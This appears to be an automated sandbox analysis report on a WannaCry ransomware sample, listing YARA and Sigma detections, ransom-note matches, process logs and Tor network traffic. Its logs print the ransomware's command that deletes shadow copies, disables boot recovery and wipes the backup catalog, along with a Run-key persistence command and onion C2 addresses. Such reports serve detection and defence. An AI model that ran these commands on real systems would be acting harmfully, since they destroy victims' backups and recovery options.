    • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
    • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
    WannaCry.binWin32_Ransomware_WannaCryunknownReversingLabs
    • 0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
    • 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\@Please_Read_Me@.txtWannaCry_RansomNoteDetects WannaCry Ransomware NoteFlorian Roth
    • 0x2c0:$s1: A: Don't worry about decryption.
    • 0x0:$s2: Q: What's wrong with my files?
    C:\Users\user\AppData\Local\@Please_Read_Me@.txtWannaCry_RansomNoteDetects WannaCry Ransomware NoteFlorian Roth
    • 0x2c0:$s1: A: Don't worry about decryption.
    • 0x0:$s2: Q: What's wrong with my files?
    C:\Users\user\AppData\Local\@Please_Read_Me@.txtWannaCry_RansomNoteDetects WannaCry Ransomware NoteFlorian Roth
    • 0x2c0:$s1: A: Don't worry about decryption.
    • 0x0:$s2: Q: What's wrong with my files?
    C:\Users\user\Desktop\r.wnryWannaCry_RansomNoteDetects WannaCry Ransomware NoteFlorian Roth
    • 0x27c:$s1: A: Don't worry about decryption.
    • 0x0:$s2: Q: What's wrong with my files?
    C:\Users\user\Desktop\@WanaDecryptor@.exeJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
      Click to see the 22 entries
      SourceRuleDescriptionAuthorStrings
      0000000F.00000003.1474514530.00000000009A8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
        0000000F.00000000.1444934334.000000000040E000.00000008.00000001.01000000.00000008.sdmpwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
        • 0x14d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
        • 0x1500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
        0000004F.00000000.1576842950.000000000041F000.00000008.00000001.01000000.0000000B.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
          Process Memory Space: WannaCry.exe PID: 7080JoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
            Process Memory Space: @WanaDecryptor@.exe PID: 4928JoeSecurity_Conti_ransomwareYara detected Conti ransomwareJoe Security
              Click to see the 1 entries

              Operating System Destruction

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: @WanaDecryptor@.exe vs, ParentImage: C:\Users\user\Desktop\@WanaDecryptor@.exe, ParentProcessId: 1112, ParentProcessName: @WanaDecryptor@.exe, ProcessCommandLine: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, ProcessId: 3604, ProcessName: cmd.exe

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades): Data: Command: wmic shadowcopy delete, CommandLine: wmic shadowcopy delete, CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3604, ParentProcessName: cmd.exe, ProcessCommandLine: wmic shadowcopy delete, ProcessId: 2836, ProcessName: WMIC.exe
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\Desktop\tasksche.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 1740, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hdahtimfel691
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "hdahtimfel691" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f, CommandLine: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "hdahtimfel691" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "hdahtimfel691" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6220, ParentProcessName: cmd.exe, ProcessCommandLine: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "hdahtimfel691" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f, ProcessId: 1740, ProcessName: reg.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "hdahtimfel691" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f, CommandLine: cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "hdahtimfel691" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\WannaCry.exe" , ParentImage: C:\Users\user\Desktop\WannaCry.exe, ParentProcessId: 7080, ParentProcessName: WannaCry.exe, ProcessCommandLine: cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "hdahtimfel691" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f, ProcessId: 6220, ProcessName: cmd.exe
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\WannaCry.exe, ProcessId: 7080, TargetFilename: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\StartUp\~SDF7F2.tmp
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: @WanaDecryptor@.exe vs, ParentImage: C:\Users\user\Desktop\@WanaDecryptor@.exe, ParentProcessId: 1112, ParentProcessName: @WanaDecryptor@.exe, ProcessCommandLine: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, ProcessId: 3604, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo, CommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: consent.exe 6008 686 000002152F62E5C0, ParentImage: C:\Windows\System32\consent.exe, ParentProcessId: 1244, ParentProcessName: consent.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo, ProcessId: 6008, ProcessName: svchost.exe
              Source: Process startedAuthor: Michael Haag: Data: Command: cscript.exe //nologo m.vbs, CommandLine: cscript.exe //nologo m.vbs, CommandLine|base64offset|contains: (, Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c 7551728024260.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1252, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe //nologo m.vbs, ProcessId: 3644, ProcessName: cscript.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-04T08:43:59.684203+020020283773Unknown Traffic192.168.2.174971851.254.101.2429001TCP
              2024-10-04T08:44:21.090033+020020283773Unknown Traffic192.168.2.1749719194.109.206.212443TCP
              2024-10-04T08:44:21.892170+020020283773Unknown Traffic192.168.2.174972037.187.7.74443TCP
              2024-10-04T08:44:25.202134+020020283773Unknown Traffic192.168.2.1749725171.25.193.980TCP
              2024-10-04T08:44:31.988044+020020283773Unknown Traffic192.168.2.1749726185.32.222.2379444TCP
              2024-10-04T08:44:42.696351+020020283773Unknown Traffic192.168.2.174972451.254.246.2039001TCP
              2024-10-04T08:44:42.934849+020020283773Unknown Traffic192.168.2.1749721163.172.131.88443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: C:\Users\user\AppData\Local\@WanaDecryptor@.exe.lnkAvira: detection malicious, Label: LNK/Runner.VPDJ
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeReversingLabs: Detection: 97%
              Source: C:\Users\user\Desktop\WannaCry.binReversingLabs: Detection: 94%
              Source: C:\Users\user\Desktop\taskdl.exeReversingLabs: Detection: 95%
              Source: C:\Users\user\Desktop\taskse.exeReversingLabs: Detection: 89%
              Source: C:\Users\user\Desktop\u.wnryReversingLabs: Detection: 97%
              Source: C:\Users\user\Documents\@WanaDecryptor@.exeReversingLabs: Detection: 97%
              Source: C:\Users\user\Downloads\@WanaDecryptor@.exeReversingLabs: Detection: 97%
              Source: taskhsvc.exe, 00000073.00000002.2408003351.000000000526E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN RSA PUBLIC KEY-----memstr_7f715e0e-7
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\~SD582F.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\~SD5830.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\~SD5832.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\~SD5833.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\~SD5831.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\~SD5834.tmpJump to behavior

              Networking

              barindex
              Source: WannaCry.exe, 0000000F.00000003.1971852615.0000000002669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C115p7UMMngoj1pMvkpHijcRdfJNXj6LrLngx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
              Source: @WanaDecryptor@.exe, 0000004F.00000002.2327393102.0000000000198000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: C115p7UMMngoj1pMvkpHijcRdfJNXj6LrLngx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
              Source: @WanaDecryptor@.exe, 00000052.00000002.2327516450.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: C115p7UMMngoj1pMvkpHijcRdfJNXj6LrLngx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
              Source: @WanaDecryptor@.exe, 00000055.00000002.1589306611.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: C115p7UMMngoj1pMvkpHijcRdfJNXj6LrLngx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\tor.exe
              Source: global trafficTCP traffic: 192.168.2.17:49718 -> 51.254.101.242:9001
              Source: global trafficTCP traffic: 192.168.2.17:49724 -> 51.254.246.203:9001
              Source: global trafficTCP traffic: 192.168.2.17:49726 -> 185.32.222.237:9444
              Source: Joe Sandbox ViewIP Address: 194.109.206.212 194.109.206.212
              Source: Joe Sandbox ViewIP Address: 171.25.193.9 171.25.193.9
              Source: Joe Sandbox ViewIP Address: 171.25.193.9 171.25.193.9
              Source: Network trafficSuricata IDS: 2028377 - Severity 3 - ET JA3 Hash - Possible Malware - Malspam : 192.168.2.17:49719 -> 194.109.206.212:443
              Source: Network trafficSuricata IDS: 2028377 - Severity 3 - ET JA3 Hash - Possible Malware - Malspam : 192.168.2.17:49725 -> 171.25.193.9:80
              Source: Network trafficSuricata IDS: 2028377 - Severity 3 - ET JA3 Hash - Possible Malware - Malspam : 192.168.2.17:49718 -> 51.254.101.242:9001
              Source: Network trafficSuricata IDS: 2028377 - Severity 3 - ET JA3 Hash - Possible Malware - Malspam : 192.168.2.17:49720 -> 37.187.7.74:443
              Source: Network trafficSuricata IDS: 2028377 - Severity 3 - ET JA3 Hash - Possible Malware - Malspam : 192.168.2.17:49726 -> 185.32.222.237:9444
              Source: Network trafficSuricata IDS: 2028377 - Severity 3 - ET JA3 Hash - Possible Malware - Malspam : 192.168.2.17:49724 -> 51.254.246.203:9001
              Source: Network trafficSuricata IDS: 2028377 - Severity 3 - ET JA3 Hash - Possible Malware - Malspam : 192.168.2.17:49721 -> 163.172.131.88:443
              Source: unknownTCP traffic detected without corresponding DNS query: 51.254.101.242
              Source: unknownTCP traffic detected without corresponding DNS query: 194.109.206.212
              Source: unknownTCP traffic detected without corresponding DNS query: 194.109.206.212
              Source: unknownTCP traffic detected without corresponding DNS query: 51.254.101.242
              Source: unknownTCP traffic detected without corresponding DNS query: 51.254.101.242
              Source: unknownTCP traffic detected without corresponding DNS query: 194.109.206.212
              Source: unknownTCP traffic detected without corresponding DNS query: 37.187.7.74
              Source: unknownTCP traffic detected without corresponding DNS query: 37.187.7.74
              Source: unknownTCP traffic detected without corresponding DNS query: 37.187.7.74
              Source: unknownTCP traffic detected without corresponding DNS query: 51.254.101.242
              Source: unknownTCP traffic detected without corresponding DNS query: 51.254.101.242
              Source: unknownTCP traffic detected without corresponding DNS query: 163.172.131.88
              Source: unknownTCP traffic detected without corresponding DNS query: 163.172.131.88
              Source: unknownTCP traffic detected without corresponding DNS query: 163.172.131.88
              Source: unknownTCP traffic detected without corresponding DNS query: 194.109.206.212
              Source: unknownTCP traffic detected without corresponding DNS query: 194.109.206.212
              Source: unknownTCP traffic detected without corresponding DNS query: 51.254.246.203
              Source: unknownTCP traffic detected without corresponding DNS query: 51.254.246.203
              Source: unknownTCP traffic detected without corresponding DNS query: 51.254.246.203
              Source: unknownTCP traffic detected without corresponding DNS query: 37.187.7.74
              Source: unknownTCP traffic detected without corresponding DNS query: 37.187.7.74
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
              Source: taskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
              Source: taskhsvc.exe, 00000073.00000002.2349107247.0000000003130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
              Source: taskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://freehaven.net/anonbib/#hs-attack06
              Source: WannaCry.exe, 0000000F.00000003.1474514530.00000000009A8000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000004F.00000000.1576842950.000000000041F000.00000008.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000004F.00000002.2328619800.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000052.00000002.2328607829.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000055.00000002.1589418005.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000005A.00000002.1583977625.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000005C.00000002.1584848304.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000005F.00000002.1586153016.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000060.00000002.1587347770.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000063.00000002.1588770420.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000065.00000002.1590413504.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000068.00000002.1591580605.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000069.00000002.1593109838.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000006A.00000002.1594769324.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000006C.00000002.1596337196.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000006E.00000002.1599571092.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000006F.00000002.1600918230.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000070.00000002.1601807638.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000072.00000002.1603420323.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000074.00000002.1604662482.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000076.00000002.1605940913.0000000000421000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s
              Source: WannaCry.exe, 0000000F.00000003.1474514530.00000000009A8000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000004F.00000000.1576842950.000000000041F000.00000008.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000004F.00000002.2328619800.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000052.00000002.2328607829.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000055.00000002.1589418005.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000005A.00000002.1583977625.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000005C.00000002.1584848304.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000005F.00000002.1586153016.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000060.00000002.1587347770.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000063.00000002.1588770420.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000065.00000002.1590413504.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000068.00000002.1591580605.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000069.00000002.1593109838.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000006A.00000002.1594769324.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000006C.00000002.1596337196.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000006E.00000002.1599571092.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000006F.00000002.1600918230.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000070.00000002.1601807638.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000072.00000002.1603420323.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000074.00000002.1604662482.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000076.00000002.1605940913.0000000000421000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how
              Source: @WanaDecryptor@.exe, 00000052.00000002.2339486528.0000000000AD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
              Source: taskhsvc.exe, 00000073.00000002.2506046937.000000006C21A000.00000008.00000001.01000000.00000010.sdmp, taskhsvc.exe, 00000073.00000002.2492523449.000000006BF7C000.00000008.00000001.01000000.00000013.sdmp, libeay32.dll.79.drString found in binary or memory: http://www.openssl.org/V
              Source: taskhsvc.exe, 00000073.00000002.2503773853.000000006C19D000.00000002.00000001.01000000.00000010.sdmp, libeay32.dll.79.drString found in binary or memory: http://www.openssl.org/support/faq.html
              Source: taskhsvc.exe, 00000073.00000002.2503773853.000000006C19D000.00000002.00000001.01000000.00000010.sdmp, libeay32.dll.79.drString found in binary or memory: http://www.openssl.org/support/faq.htmlRAND
              Source: @WanaDecryptor@.exe, 0000004F.00000003.1601408389.0000000002911000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000073.00000002.2510812417.000000006E4E0000.00000008.00000001.01000000.00000011.sdmpString found in binary or memory: http://www.zlib.net/D
              Source: @WanaDecryptor@.exe, 0000004F.00000003.1601937473.000000000275E000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relay
              Source: @WanaDecryptor@.exe, 0000004F.00000003.1601937473.000000000275E000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relayError
              Source: @WanaDecryptor@.exe, 00000052.00000002.2327516450.000000000019B000.00000004.00000010.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000055.00000002.1589306611.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
              Source: @WanaDecryptor@.exe, 0000004F.00000002.2327393102.0000000000198000.00000004.00000010.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000055.00000002.1589306611.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
              Source: taskhsvc.exe, 00000073.00000003.2150784228.0000000003EB9000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000073.00000003.2128753931.000000000407A000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000073.00000003.2139346119.00000000044B0000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000073.00000003.2131015386.00000000041EA000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000073.00000002.2349107247.0000000003130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sabotage.net
              Source: taskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://trac.torproject.org/8742
              Source: taskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://trac.torproject.org/projects/tor/ticket/14917.
              Source: taskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%s
